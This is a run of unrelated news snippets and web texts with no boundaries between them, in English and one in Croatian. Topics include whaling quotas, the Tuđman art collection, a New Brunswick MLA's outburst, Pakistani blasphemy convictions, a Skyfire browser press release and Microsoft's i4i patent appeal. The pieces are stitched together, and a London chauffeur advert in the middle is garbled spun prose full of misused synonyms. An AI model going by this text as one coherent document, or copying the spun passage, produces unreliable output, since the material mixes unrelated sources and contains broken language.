The proposal would allow the three countries to continue killing a smaller number of whales commercially over the next decade , with a view to ending the controversial hunts altogether , according to a report in the New York Times .
The paper said that the countries would have to agree to closer monitoring of their whaling fleets , including the use of tracking devices and the presence of international observers .
They would also be expected to participate in a whale DNA registry as a deterrent against illegal trade in whale meat .
The newspaper cited negotiators as saying that an agreement could be reached in weeks , ahead of the IWC 's annual meeting in Morocco in June .
It is not clear , however , whether its 88 members would ratify the move .
The compromise , which could change dramatically in the coming weeks , would force Japan , Norway and Iceland to cut their annual whale cull by about half , a move that would spare more than 5,000 whales over the next decade .
" This is one of the toughest negotiations I 've been involved in in 38 years , " the IWC chairman , Cristian Maquieira , told the paper .
" If this initiative fails now , it means going back to years of acrimony . "
But campaigners said the proposal would do little to protect whales in the short term and did not compel the three countries to end whaling after 10 years .
" Countries should n't be looking at ways to legitimise existing loopholes in the IWC moratorium , but at closing them altogether , " Willie MacKenzie , oceans campaigner at Greenpeace UK , said .
" Scientific whaling is being used to permit commercial whaling and whale sanctuaries are not being respected , so this compromise stands in the way of conservation .
Governments that oppose whaling , including the UK , should be fighting just as hard as Japan to get their way . "
Any proposal that would permit Japan to continue its hunts in the Antarctic is expected to be opposed by Australia and New Zealand .
Australia has threatened to go to the international court of justice to end Tokyo's " lethal research " into almost 1,000 whales every winter .
Japan uses a loophole in the 1986 IWC moratorium on commercial whaling to kill whales for what it claims is vital scientific research .
This week Japan 's whaling fleet returned to port with just over half its target catch after clashes with the marine conservation group Sea Shepherd .
Pressure to crack down on the illegal international market in whale meat is expected to grow after a report presented evidence that meat from Japan is being served at restaurants in South Korea and the US .
In the report , published yesterday in the journal Biology Letters , scientists from Oregon State University performed DNA tests on whale meat sold since 1993 and found that some of it had come from whales slaughtered during Japan 's research programme in the Antarctic .
" Since the international moratorium it has been assumed that there is no international trade in whale products , " said Scott Baker , associate director of the university 's marine mammal institute .
" But when products from the same whale are sold in Japan in 2007 and in Korea in 2009 , it suggests that international trade , though illegal , is still an issue . "
Yesterday police in the South Korean capital Seoul raided a Japanese restaurant and questioned its owner on suspicion of serving illegally imported whale meat .
The study suggests that meat served last year at a restaurant in Los Angeles came from a sei whale – an endangered species – that had also been sold in Japan .
Obitelj Tuđman razotkrila je svoju kolekciju umjetnina .
U njoj se nalaze djela hrvatskih umjetnika , a među njima su i dva remek - djela koja stoje i do 30.000 eura .
Primajući novinare u svoju kuću po prvi put , obitelj Tuđman je otkrila i kolekciju umjetnina koju posjeduje .
Osim nekoliko iznimaka , riječ je zbirci koja govori o prosječnom građanskom ukusu .
Stručnjaci , koji su o njima progovorili za Jutarnji list , kažu kako radovi u zbirci variraju u kvaliteti i nisu rezultat nekakvog profiliranog umjetničkog ukusa , nego je riječ o umjetninama koje su očito Franji Tuđmanu poklanjane te ih je potom obitelj , prema svom ukusu , stavljala na zid .
Vrijednost najskuplje slike ne prelazi 30 tisuća eura .
Ankica Tuđman na
Trgu je bila otvorila galeriju
Čudo hrvatske naive , u kojoj je prodavala mahom umjetnike naive , koji u umjetničkim krugovima nisu cijenjeni .
Zbirka koju drži kod kuće puno je vrednija .
U svom dnevnom boravku obitelj Tuđman na zidu drži djela isključivo hrvatskih autora nastalih u prvoj polovici 20 .
stoljeća , u razdoblju takozvane zagrebačke šarene škole .
Riječ je o odrazu ukusa većine Hrvata , s plate žnom moći u prosjeku 10 - ak tisuća eura za jedno platno .
No , obitelj Tuđman posjeduje i dva remek - djela hrvatske umjetnosti .
Riječ je o slici Krste Hegedušića iz 1927 . , koja se zove Bilo nas je pet u kleti i stoji do 30 tisuća eura , te o slici Ljubavnici Miljenka Stančića , koja datira iz pedesetih godina prošlog stoljeća , i cijena bi mogla biti približno slična .
Slika s motivom voća ( breskve ) po svojoj prilici pripada Ljubi Babiću , za kojeg je poznato da je bio jedan od Tuđmanovih omiljenih slikara , a procjenjuje se na 25 tisuća eura , piše Jutarnji .
Stručnjaci su prepoznali i ženski akt Marijana Trepšea , morski pejzaž Mencija Clementa Crnčića , kao i motiv crkvice uz more Mirka Račkog .
U zbirci se , kažu , nalazi i mrtva priroda s motivom cvije ća u vazi , autora Zlatka Šulentića .
Pod upitnikom su akt s crnim podvezicama , koji po nekima pripada Vilku Gecanu , a onda bi vrijedio 40 tisuća eura .
Pretpostavljaju da mrtva priroda pripada Celestinu Medoviću , a Ribe na tanjuru Jerolimu Mišeu .
The pandemic did n’t displace the opioid epidemic , it magnified it , increasing stress , fear , and anxiety for people with substance - use disorders and the workers on the frontlines helping them .
Read more from our # StoriesFromSullivan team : rockinst.org/blog/stress-fe… twitter.com/abbygoodnough/…
As schools rely upon more virtual instruction , incorporating and administering online formative assessments as a purposeful part of the instructional program is an attractive option for helping to measure students ’ academic standing .
rockinst.org/blog/without-t…
Hear from workers on the frontlines of the opioid epidemic in our most recent @PolicyOutsider episode .
Researchers from the # StoriesfromSullivan team share what they are finding about substance - use treatment access and effectiveness during COVID - 19 .
rockinst.org /outsider/
At the same time that public sector offices and agencies were transitioning to a more remote workforce governments faced an unprecedented “ surge ” in the need for services from the public .
rockinst.org/blog/public-se…
Abel LeBlanc , a Liberal member of the New Brunswick legislative assembly , was thrown out of the room yesterday after he gave a rival politician the finger , called her a liar , and then asked the entire parliament to " go outside " ( presumably for some sort of fisticuffs ) .
The quote below gives you a taste of the outburst , but you owe it to yourself to download the audio , which I 've edited out of the CBC As it Happens Podcast and uploaded to the Internet Archive for your enjoyment .
Remix gold .
Ringtone city .
Listen to this rage .
Just listen to it .
Robichaud complained again , but LeBlanc refused to apologize .
" I 'll not apologize in this house for that young lady over there , " he said , before accusing Blaney of telling lies about Saint John - Fundy MLA Stuart Jamieson .
Jamieson was asked to step down as tourism minister on Friday for suggesting the controversial deal between NB Power and Hydro - Québec should go to a referendum .
LeBlanc did not elaborate on the alleged lies before extending his middle finger again at another Tory MLA and shaking his fist .
" I 'm gonna tell you , Dale [ Graham , Tory MLA for Carleton ] , I 'll walk outside with any one of yas here , " LeBlanc said .
" Do n't ever laugh at me .
Yes , I gave you that .
And I 'll give you that again .
And I 'll give you this if you want to go outside .
You 're a punk ! "
N.B. MLA expelled for rude gesture
MP3 link
A kitchen worker at an exclusive English boarding school has been arrested for trying to poison a batch of soup being prepared for students , administrators said on Wednesday .
The director of the Stowe School in Buckingham , 120 kilometres north - west of London , said a household cleaning agent was put into the carrot and coriander soup , but no one was harmed because the soup was n't served to students .
Kitchen staff became suspicious of the soup because of an acrid smell , head teacher Anthony Wallersteiner said .
" Before any meal is taken up from the kitchens to be served the food is tested , and it was during the routine sampling that one of the duty chefs discovered there was something acrid in the soup that was being prepared , " he said .
The soup would have been offered to about 650 students who usually have dinner at the school , officials said .
Beijing guys hitch - hike all the way to visit one ’s girlfriend in Berlin
From xinhuanet :
Two Beijing guys spent 3 and a half months hitch - hiking over 16,000 km across 13 countries to see one of the guy ’s girl friend in Berlin , Germany .
Altogether they took 88 hitch rides , including tricycle , tractor and carriage .
Their journey was dubbed “ the most romantic hitch - hike in history ” by netizens .
Liu Chang and Gu
Yue are both born in 70s , they were first seen standing in the mist of Hou Hai thumbing for rides on June 8th last year .
Carrying super heavy packs , they convinced the visa officers of 12 countries by the purpose of “ backpacking travel ” .
Getting all visas done , they hit the road with cashes , credit cards , sleeping bags , laptop , camera and a few clothes .
The most difficult ride is actually in China from Beijing to Hebei , according to Liu Chang who recalled that they waited in vain for over an hour in Hou Hai , nobody would stop to take them .
Finally they got help from one driver who took them to the entrance of the highway leading to Hebei , where they continued to wait despite the rain storm .
They were asked to leave by some road maintenance workers , one of whom thoughtfully said : “ not many cars go to Berlin from here . ”
Hitch - hiking is far more difficult than they imagine .
From Beijing to Berlin , these two swarthy , ragged Chinese guys with half long hair were turned down by 1000 - some drivers .
It happened a lot of times when they had to wait hours before getting a hitch , the longest one they waited for 2 days at road side .
“ Countries like Uzbekistan , Kirghizstan do n’t have the custom of hitch - hiking , and we do n’t speak their language . ”
Said Gu
Yue , who settled this by having someone written a few cards in Russian , saying “ we need to hitch ride to Germany from China ” “ Could you give us a ride ? ”
“ Excuse us , we do n’t have money for you but we ’ve got cigarette and smiles ” …
The more they hitch , the more they love it , according to Liu Chang , and meeting so many different people is the biggest reward : a Mr. Qiao , who is delivering goods from Hebei to Shanxi , decided to keep driving for 20 years in order to build houses for his two sons ; a petrol truck driver in Xinjiang liked to take every hitch - hiker to kill the loneliness of the long journey ; a financial officer who got fired in the financial crisis took them to Czech the day after he landed a new job ; a easy - going CEO who drove a limo ; a drunk driver in Georgia who played “ Speed ” live …
The funniest experience happened in northern Iraq , where they got on a tractor and rode for 2 or 3 km before the driver switched into a smoky village .
They realized that the tractor was rushing all the way to help put out the fire , and they were brought there along .
When the fire was under control the two become the scene , and treated with dinner at an Iraqi home .
Three and a half month later , they finally reached Berlin , where lived Gu Yue ’s girl friend Ika ( dubbed ) .
“ I traveled in the direction of sunset for the last 3 months , because I know Berlin is where the sun sets , and that is where my Ika lives . ”
Said Gu Yue .
Ika , on the other hand said : “ next time you want to see me , take the plane . ”
Their journey was tagged “ Most romantic hitch - hiking in history ” “ Best Valentine gift ” by netizens .
At the moment , Gu Yuan and Ika are on vacation in Thailand , celebrating their Spring Festival .
For more , watch the “ Xing Zhe ” program aired 22:30 in Travel Channel .
pictures from Netease :
Gu Yue in Turkey
On the tricycle in Aksu , Xinjing .
Pretty and kind - hearted driver .
It is common to wait for hours before get a ride , the longest one they wait for 2 days on road side .
On a truck that ’s delivering Coca - cola In Uzbekistan .
The tractor that took them to the fire scene , and got them a dinner in an Iraq home .
Taking a gypsy carriage in Bulgaria
Finally they reached Berlin .
Gu
Yue and his girl friend Ika , who said “ next time you want to see me , take the plane . ”
During yesterday 's YouTube question time with the president , the question voted number one by CitizenTube visitors in the " jobs and economy " category was this one , from James Earlywine of Indianapolis :
An open Internet is a powerful engine for economic growth and new jobs .
Letting large companies block and filter online content and services would stifle needed growth .
What is your commitment to keeping the Internet open and neutral in America ?
Obama 's answer was spot on :
I 'm a big believer in Net Neutrality .
I campaigned on this .
I continue to be a strong supporter of it .
My FCC Chairman Julius Genachowski has indicated that he shares the view that we 've got to keep the Internet open , that we do n't want to create a bunch of gateways that prevent somebody who does n't have a lot of money but has a good idea from being able to start their next YouTube or their next Google on the Internet .
This is something we 're committed to .
We 're getting pushback , obviously , from some of the bigger carriers who would like to be able to charge more fees and extract more money from wealthier customers .
But we think that runs counter to the whole spirit of openness that has made the Internet such a powerful engine for not only economic growth , but also for the generation of ideas and creativity .
Save the Internet 's Tim Karr responds :
As the FCC prepares to make new rules on Net Neutrality this spring , it 's important to hear Obama take a stand .
Obama 's statement comes on the heels of other prominent public officials expressing their support of Net Neutrality and Internet freedom , including FCC Commissioner Mignon Clyburn and House Speaker Nancy Pelosi .
" I hope we can do this again , " Obama said at the end of the interview .
" This gives me great access to all of the people out there with your wonderful ideas .
"
It also gives all of us great access to those in power .
And is n't that what protecting the open Internet is all about ?
The FCC rule making is critical , and given the strong support of Net Neutrality in the current FCC is likely to give us some breathing room .
But regulations can be changed by the next FCC appointed by a hostile president .
Congress needs to act , giving Net Neutrality the full weight of law .
They have some time to do that , thanks to the FCC , but needs to act this session on Rep. Ed Markey 's H.R. 3458 , the Internet Freedom Preservation Act .
PRS collects royalty payments on behalf of its members
The royalties that UK songwriters , composers and music publishers get from online sales are growing faster than the decline from CDs and DVDs .
That is the finding of PRS for Music , the not - for - profit body which ensures such groups are paid when their music is played , performed or reproduced .
It said UK online revenues for its members rose by £ 12.8 m or 73 % to £ 30.4 m in 2009 .
At the same time , UK revenues from CD or DVD sales were down £ 8.7 m .
This is the first time that the annual growth in online revenues has been higher than the fall in revenues from CD or DVD sales .
But PRS for Music chief executive Robert Ashcroft said it remained too early to say whether this represented a turning point for the industry .
PRS released the figures as it said overall global revenues for its members totalled £ 623 m last year , up from £ 608.3 m in 2008 .
The organisation represents 65,000 UK songwriters , composers and music publishers .
WASHINGTON , March 31 ( UPI ) --
Police in some U.S. cities reportedly are giving more speeding tickets to offset the recession - caused decline in general tax revenue .
" Most people , if they 're stopped now , are getting a ticket even if it 's only a minor violation of a few miles per hour , " said James Baxter , president of the National Motorists Association , a Wisconsin group that helps members fight speeding tickets .
Advertisement
A report from the Federal Reserve Bank of St. Louis and the University of Arkansas at Little Rock found that a 10 - percent drop in revenue growth prompted a 6.4 percent increase in the growth rate of traffic tickets , USA Today reported Wednesday .
The AAA auto club , however , said its members had n't complained of an increase in traffic tickets and the National Troopers Coalition , which represents 45,000 state police officers , disputed there was a lower tolerance for speeding among state troopers .
Faith project equips church for New Atheists
The Test of Faith project is touring the country to help the church answer some of the questions being thrown up by New Atheists .
The tour starts on Monday at the Aberdeen School of Christian Studies and ends on 19 May at the London Institute of Contemporary Christianity .
It is being aimed at pastors , youth and small group leaders , and evangelists to resource and encourage them .
“ The New Atheists – ( ‘ God Delusion ’ author Richard ) Dawkins et al – are throwing up questions many church leaders do n’t feel equipped to answer – particularly questions of science and faith , ” said Ruth Bancewicz , Director of the Test of FAITH project .
“ The question of whether science and faith are compatible is not going to go away , and the Church needs to be ready to give an answer .
This tour will enable that to happen . ”
The Test of FAITH project is an initiative of the Faraday Institute , which produces resources for the church on issues of science and Christianity .
Tour dates :
1 March
Aberdeen School of Christian Studies
2 March
Holy Trinity , St Andrews
9 March
LST , Northwood
10 March
Trinity College , Bristol
11 March
St Johns , Nottingham
21 April
Cliff College , Sheffield
27 April
International Christian College , Glasgow
19 May
London Institute of Contemporary Christianity
On the web :
www.testoffaith.com
THE web developer whose code was modified to remove references to internet filtering on a government website has asked for it to be taken down .
" I would appreciate it if you could remove my Javascript Tag Cloud from your website , " said developer and blogger Aleks Bochniak in a letter to the office of Communications Minister Stephen Conroy .
" I do not want in any way to be associated with yourself , your office or your policies . "
Mr Bochniak is the original author of a script on Senator Conroy 's official website that was modified to remove mention of the words " ISP Filtering " .
The script first came to light last week .
Since then , details of who wrote it , who modified it and when it was modified have been removed from the site .
More :
The web filter minister and the delete key »
Mr Bochniak publishes a web development tutorial blog from which he says the script was originally taken .
" This is one usage of my code which I would have appreciated them asking my permission , because if I had known the final outcome I would not have let them , " he said .
Senator Conroy 's office has not said whether it intends to take the code down .
Links
Dear Minister Conroy — http://aleks.bochniak.net/postbox/general/dear-min...
Love him or hate him ( and based on some recent appearances , notably side by side Hugh Hendry , he has n't left much room for amorous intentions ) , Joe Stiglitz once again takes center stage , this time in this appearance at the Commenwealth Club , in which he discusses various things ( among which are his grading of Obama , which compared to Dubya ' administration , he gives an A+ , and since this is roughly in line with where the rating agencies rate the US , it should raise all sorts of red flags ) .
One of the key topics of discussion is his claim that efficient markets are a myth , and that Adam Smith 's " invisible hand " appears as such because it was never truly there .
Joe 's bashing of economists with their hollow goal - seeked theories is one thing we can certainly agree with , and as to the market being propped by visible hands and other means , well , that is beyond the scope of this post ( unless Chairman Shalom decides to grace the comment stream with his presence ) .
" The theories that said that markets work perfectly were all based on very simplistic models of perfect competition and perfect information .
My own work we show that the reason that when there is asymmetric information , the reason that the invisible hand often seemed invisible , was that it was n't there .
And I do n't think today anybody would claim that the pursuit of self - interest by bankers , which is sometimes called greed [ do n't tell the screenplay writer for Wall Street ] has led to the well - being of all of society .
And yet this was the central notion taught in almost every graduate school in the country . "
So there you have it - generations of economists brought up on flawed concepts , eagerly and blindly perpetuating the flaws with each new generation ( and charging $ 50 k a year in the process ) .
Yet the notable issue here is , assuming one agrees with Stiglitz , that markets are imperfect , and benefit banks , precisely because banks , due to their unprecedented size and trading monopoly , now have unparalleled asymmetric information access , thereby cementing their position as the most lucrative establishments in the history of capitalism , which coupled with a government 's unwillingness to touch these firms for fear of an imaginary Nuclear Holocaust , will likely persist as such until the onset of the real WWIII .
Once again we repeat what we have been saying on so many occasions before : banks , and here we envision Goldman Sachs , are now monopolistic institutions , whose existence leads to nothing less than their own incremental growth until such time as all competition is stifled and the firm iteslef implodes like a supernova .
In the meantime , the management team ( and equityholders if they are lucky to be repeatedly bailed out any time the firm 's VaR models end up being horrendously wrong , see the following interview by Kathryn Welling with Jim Rickards ) gets richer and richer , even as market participants ( doomed from the beginning incipient retail and institutional competitors to the monopolist ) , and taxpayers ( unwitting providers of bailout capital ) just get poorer and poorer , until the inevitable revolution restores the status quo .
As always - we request the attention of Christine Varney , and the entire anti-trust arm of the US government , in claiming that Goldman Sachs has to be dismantled forcefully ( as it will not happen voluntarily ) before the societal implications of Goldman 's size become a destabilizing factor and potentially lead to war : civil or otherwise .
In the meantime , Goldman 's warehousing of , and trading on , " asymmetric " information will continue , and be a persistent ridicule to wooden economists , who are still stuck with 18th century concepts of reality .
Relevant Stiglitz clip below , and the entire hour + long program can be found here .
( we recommend watching the full thing , as some rather good ideas are presented )
All employees and applicants for employment are protected against unfair discrimination on several grounds , one of which is gender .
A recent Labour Court case ( 1 ) shows how such protection applies to a transgender applicant for employment .
The company , Datacentrix , interviewed Mr Atkins for a position as an IT technician .
It was impressed with his credentials and offered him the job .
While he was working out his notice with his employer , Atkins advised Datacentrix that he was planning to undergo a sex - change operation .
The company withdrew its offer of employment , claiming that Atkins should have disclosed this information in interview .
The company stated that he had been dishonest and that this was the reason for the dismissal , not his plan to change gender .
Atkins took the case to the Labour Court , claiming unfair dismissal on the grounds that the company had discriminated against him on the basis of gender .
The court gave its judgment in December 2009 .
The court accepted that Atkins was transsexual , which is a recognized psychological condition where people perceive themselves as members of the opposite sex .
The remedy is surgery to align the person 's body with his or her psychological gender .
The judge did not accept the company 's argument that it had dismissed Atkins for dishonesty .
It was clear that the reason for the dismissal was the disclosure of his plan to undergo a sex change .
The court stated that this constituted discrimination on the basis of gender .
Such discrimination is prohibited by both the Labour Relations Act 1995 and the Employment Equity Act 1997 .
The company had argued that Atkins was obliged to disclose his proposed sex change in interview .
The judge found that he had no such duty .
The judge was inclined to award Atkins substantial damages to make an example of his case , but as Atkins had remained in the employ of his previous company , he suffered little loss .
He was therefore awarded five months ' salary in compensation .
Had Atkins been able to prove further losses , he may have received more .
Employers must be aware that employees are protected by the Constitution against unfair discrimination on listed or arbitrary grounds .
Ignoring such protection can lead to damages claims .
For further information on this topic please contact Susan Stelzner at Edward Nathan Sonnenbergs by telephone ( +27 21 410 2500 ) , fax ( +27 21 410 2555 ) or email ( sstelzner@ens.co.za ) .
Endnotes
(1) Atkins v Datacentrix ( Pty ) Ltd , as yet unreported .
After decades of struggle and months of political in - fighting , Barack Obama stood poised to sign into law historic reforms to America 's healthcare system .
But first his vice - president had to have his foot removed from his mouth .
At a White House ceremony for Obama to seal passage of the legislation by giving it his signature , vice - president Joe Biden gave an introduction praising Obama 's leadership .
" Mr President , you 're the guy that made it happen , " he said , before embracing Obama and excitedly whispering in his ear : " This is a big fucking deal ! "
The aside may have been meant for Obama 's ears alone but it was picked up the microphone on the podium and broadcast to the watching television audience of millions .
Applause drowned out Biden 's comment to the dignitaries in the East Room but the reaction on blogs and cable news channels was instantaneous .
" The vice - president used a word that most of us would never use in front of our mother , " said CNN anchor Rick Sanchez , explaining why his network bleeped out the remark in its replays .
Ben Smith , a blogger for the Politico website , labelled it : " The mother of all Biden moments . "
Shortly after , White House press secretary Robert Gibbs embraced Biden 's slip , by writing on Twitter : " And yes , Mr Vice President , you 're right . "
It certainly is n't the first time that Biden has let his tongue get the better of his brain .
Long before Obama chose him to be his vice - president , Biden was renowned for his gaffes .
During the Democratic presidential primaries , Biden apologised for describing Obama as " the first mainstream African - American who is articulate , and bright and clean , and a nice - looking guy " .
In 2008 Biden urged a wheelchair - using local politician at a rally in Missouri : " Stand up ' , Chuck , let them see you . "
Biden is n't the first vice - president to resort to Anglo - Saxon .
Dick Cheney told Democratic senator Patrick Leahy to " fuck yourself " during a dispute on the floor of the Senate in 2004 .
Even Cheney 's boss , George W Bush , was once caught on video describing a journalist as a " major - league asshole " .
Biden should remember the words of John Nance Garner , vice - president under Franklin Roosevelt , who said : " The vice - presidency is n't worth a pitcher of warm piss . "
N.J. blogger
Hal Turner today said the FBI told him to make violent statements
so that he could infiltrate extremist right - wing groups , according to a report by NorthJersey.com .
Turner is on trial for threatening three federal appeals court judges online , the report said .
Previous coverage :
• Federal judges testify they felt threatened by N.J. blogger Hal Turner
• Prosecutors ask to exclude ties to FBI in retrial of N.J. blogger accused of threatening judges
• Jury in hate blogger Hal Turner 's case told judge :
We 're deadlocked
• Jury hears closing arguments in case of N.J. blogger accused of threatening judges
• Gov.-elect Chris Christie is subpoenaed to testify in Hal Turner trial
This Los Angeles City Council has passed a resolution to get out of various interest - rate swaps it entered into banks pre-crisis .
According to the SEIU , getting out of the swaps , will save LA $ 19 million per year .
So why does the city think it should be able to get out of legally entered - into swaps without having to pay a cancellation fee ?
Because , according to the SEIU 's Marcus Mrowka , all those swaps were entered into pre-crisis , before the banks changed all the rules .
Up next : the union will push for various Northern California municipalities to do the same , potentially costing banks $ 150 million / year .
Now , why would banks relent to the demands of the cities ?
Think about it : the cities do business with these banks , and do have leverage of them .
Cancelling a few swaps might be well worth it .
Heading to the place that is known for authentic tourist spots and a city of different social foundations .
Indeed , you have where we ’re going with this .
We ’re discussing London .
It ’s a city brimming with energy , rich culture and profound history .
To have its the greater part , you need the opportunity of moving about unreservedly in the city .
This is the best part .
When you realize you have no limits to move about from one spot to the next , that is the best feeling ever .
Thusly , you need the best chauffeur organization hired before you arrive .
The service will absolutely guarantee that .
The best thing about these chauffeur services is you can cover the longest separate absent much issue .
Indeed , you are facilitated from the stresses of finding another ride all that you have to go somewhere .
You book a car for the whole excursion , and you move openly from one milestone to the next without care .
We by and by thinking car hires are the best sensible and mindful approach to take care of business .
So as to get the best car hire service , you have to do a little examine on your end .
You need to locate the best specialists offering car hire services at the most moderate costs .
For that , you can look at the chauffeur cost of various organizations to know which one is offering the least .
In any case , the organization with a standard service will offer various contracting choices from which their clients can pick .
They have to guarantee that their clients travel in the most agreeable and helpful way .
Be that as it may , regardless you have to consider a couple of elements before you hire your reasonable chauffeur hires in London .
Right off the bat , make an arrangement of the considerable number of spots you need to visit , and the separation of these goals from one to the next .
When you have this factor secured , it will be a lot simpler for you to settle on your choice .
Another factor to consider is the purpose of this procuring .
Why you really need to hire a chauffeur service London .
Is it a work excursion or a recreation one with the family ?
For a business reason , you can hire a somewhat costly car to establish a connection .
In any case , on the off chance that its a family trip for relaxation , at that point a reasonable ride with every one of the highlights will do fine and dandy .
Something else considers will be the number of individuals voyaging .
It is safe to say that you are a group of four ?
Or on the other hand , is it just you and the misses ?
Do you have 4 children , or would you say you are two families going for a fun outing together ?
Consider this as well .
This factor will enable you to choose which car is perfect for the excursion .
However , you have to carefully choose a ride which is both agreeable and enormous enough to fit the family .
It ought to have every one of the highlights like cooling to have the option to give you a loosening up adventure .
In the event that you have a child with you , getting a car to situate for the little one ought to likewise be in your rundown .
There are numerous great organizations who will effectively have the option to suit you all around ok under a financial limit .
They can without much of a stretch satisfy all your different needs and necessities .
Besides , they may likewise have the option to offer a markdown in case you ’re up for one .
This is the most ideal approach to draw in clients if you catch my drift .
Nonetheless , when picking the organization , ensure you experience their site and become acquainted with about the straightforwardness of their rates and strategies .
Their offers ought to be clear , and there ought to be no concealed charges .
When you can discover rundown organizations that fulfil your guidelines and spending plan , contrast their chauffeur price with see which one is offering the least .
What ’s a more , blast !
You have a moderate organization .
Summary :
The most ideal approach to move around and about in London is by procuring the best chauffeur organization nearby .
In any case , it ’s best you pick an organization dependent on its services , bundles and chauffeur cost to ensure you are getting truly outstanding just as reasonable to meet your pocket .
by Fareed Khan
Munir Masih and Ruqqiya Bibi are convicted on the basis of the blasphemy law .
In January , they were released on bail ; now they are in two separate prison facilities .
Extremist fringe put pressure , and perhaps corrupted police to find the right evidence to justify the conviction .
Islamabad ( AsiaNews ) – A court in Kasur district , Punjab , convicted a Christian couple , Munir Masih and Ruqqiya Bibi , to 25 years in prison .
According to the Centre for Legal Aid Assistance and Settlement ( CLAAS ) , judge Ajmal Hussein convicted the couple for touching the Qur‘an without washing their hands .
Munir Masih and Ruqqiya Bibi were released on bail last January , but were re-arrested after the judge ruled against them .
The husband was locked up in Kasur ’s district prison ; the wife was sent to the women ’s prison in Multan .
Both have started serving 25 years behind bars .
CLAAS , an association that fights for the rights of the poor and marginalised , said that the couple was accused of “ contaminating ” the Qur‘an when they touched it “ without washing their hands ” .
The incident , which dates back to December 2008 , unleashed the fury of Muslim extremists who put pressure on police .
Unconfirmed reports suggest that extremists paid off police agents to discover “ new evidence ” to justify the sentence .
At the end of the police investigation , husband and wife were charged with blasphemy .
The blasphemy law is the harshest tool for religious repression available in Pakistan .
It was adopted in 1986 by then dictator Zia ul - Haq to protect Islam and its prophet , Muhammad , from attacks and insults .
In fact , it is actually comprised of sections 295 - B and 295 - C of the Pakistan Penal Code , which respectively punish with life in prison anyone who defiles , damages or desecrates a copy of the Holy Qur‘an , and imposes the death penalty on anyone who defiles the name of the Prophet Muhammad .
In the last two months , there were two more convictions against Christians in Pakistan .
On 11 January , a court in Faisalabad sentenced Imran Masih , a 26 - year - old Christian man , to life imprisonment for insulting and desecrating the Koran .
He was accused of deliberately burning Qur‘anic verses and an Arabic book in order “ foment interfaith hatred and hurt the feelings of Muslims . ”
On 25 February , a court in Karachi sentenced Qamar David , also a Christian , to life imprisonment for hurting the religious feelings of Muslims when he sent blasphemous SMS .
CLAAS announced that it was filing an appeal with the High Court in Lahore to have the 25 - year sentence against Munir Masih and Ruqqiya Bibi overturned .
Show full PR text
Skyfire Launches the First Flash Video Enabled Mobile Browser for Android
The first ' mobile browser for the Social Media generation ' eliminates broken links from your Facebook stream , tracks Twitter buzz , and makes sharing easy
Mountain View , CA – April 29 , 2010 – Skyfire , maker of the award - winning web - browser for mobile devices , today launches Skyfire 2.0 for Android , making the mobile internet experience faster , Flash - enabled and fun , with media recommendations and social features .
Skyfire is one of the fastest growing mobile browsers in the world , ranking in the top 10 all - time apps in the Nokia Ovi Store and Windows Marketplace .
Skyfire 2.0 for Android is built upon many of the popular features of Skyfire 's 1.0 browser , and uses cloud computing to give a " booster engine " to mobile phones so they can handle rich media like video .
And now , Skyfire 2.0 for Android takes mobile browsing to a new level with the addition of the SkyBarTM , a new toolbar that lets users enjoy millions of videos previously unviewable on mobile , and also discover the latest buzz on any topic they browse .
What is the SkyBarTM ?
The SkyBar brings the best of the internet to a mobile user 's fingertips , without any additional searching .
By activating the SkyBar with a single touch , users are given access to Flash videos on a web page that otherwise would not play , related content recommendations , and easier sharing with their social networks .
· Video – The " Video " icon enables users to play millions of Flash videos around the web that otherwise do not play on mobile .
This unlocks content trapped behind those error messages with question marks and blue Legos .
Behind the scenes , videos are translated into a format easier for the phone to play , like html5 video .
· Related Content – The " Explore " icon brings the most relevant content on the internet to a user 's fingertips based on what they are viewing at the time .
The Explore button pulls video , buzz , news , images and other sites from the web based on what is on the current page .
· Sharing – The " Share " icon lets users share any article or video easily to their friends on Facebook , Twitter , or by email and SMS messaging , adding a comment , and all with a single click .
The first mobile browser for the social media generation :
" Skyfire 2.0 was built for the way people use social media and the web today .
People are now starting their web experience by scanning their Facebook and Twitter news feeds , " explains Jeff Glueck , CEO of Skyfire .
" Our new browser allows you to open those links and view the videos that your friends have shared .
To make that work , people need a browser that can handle the full internet . "
The Power of Cloud Computing :
Skyfire on Android uses cloud - computing technology to enable this web video ; the benefits for consumers include faster and smoother video playback , and extended battery life by offloading more of the work to cloud servers .
At the same time , since Skyfire 2.0 is built on a webkit core , users get all the functionality they know on the default Android browser , such as pinch to zoom , copy and paste , find text on the page , open up to eight browser tabs , and more .
Skyfire is one of the fastest growing downloadable browsers with usage increasing 500 % year over year , and currently streaming over 25 million minutes of Flash video every month , more than any other mobile browser worldwide .
Skyfire 2.0 for Android is available for download worldwide free at bit.ly/skyfireandroid
About Skyfire
Skyfire is the creator of the Skyfire mobile browser , and has a mission to enable the " full internet " including rich media on mobile phones .
The browser won the Best Mobile Application - People 's Voice at the 2009 Webby Awards and was named a Top App of 2009 by the New York Times ' Gadgetwise .
Skyfire is based in Mountain View , California , in the heart of Silicon Valley .
For more information , visit www.skyfire.com, or follow Skyfire on Twitter at twitter .com / skyfire .
CINCINNATI — An
Ohio registered sex offender who described himself as " evil " has been sentenced to death in the slayings of two teenage girls .
Forty - one - year - old Anthony Kirkland of Cincinnati was sentenced Wednesday after a jury earlier this month convicted him of aggravated murder , attempted rape and other charges in the deaths of 13 - year - old Esme Kenney and 14 - year - old Casonya Crawford , both Cincinnati teenagers .
Kirkland 's attorneys offered no defense during the trial , focusing instead on trying to convince jurors to spare his life .
Kirkland told jurors he was " evil " and " a monster . "
As part of their case , prosecutors introduced details about his guilty pleas to the murders of two other females .
© Copyright 2010 Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten , or redistributed .
Word 2003 and 2007 are the most common versions on the market Microsoft has lost an appeal against a court judgement that told it to pay $ 240 m ( £ 160 m ) in damages .
In August 2009 , a US court awarded the damages to i4i which claimed Microsoft had infringed its patents .
The patents cover the use of XML , a mark - up language that preserves data formats across different programs .
The judgement also required Microsoft to remove the i4i technology from its Office software suite and stop selling the infringing programs .
The injunction on sales began in January 2010 and applied to any Microsoft Office software , specifically Word 2003 and 2007 , containing the infringing patents .
Since it lost the first round of the legal battle , Microsoft has been stripping the disputed technology from its Office products .
Soon after losing the initial case , Microsoft filed an appeal asking the court to re-think its decision .
In December 2009 , a panel of judges upheld the initial ruling .
In this second appeal , the court again re-affirmed the original ruling and spelled out why that decision was made .
In court documents spelling out their reasoning , the three appeal court judges said there was evidence that Microsoft knew i4i technology was patented before it turned up in Office programs .
The appeal is not the last that Microsoft can make .
The court documents are now being sent to the other appeal court judges who will decide if Microsoft has grounds for a wider review of the case .
The decision on the whether to hold that review is due within the next six weeks .
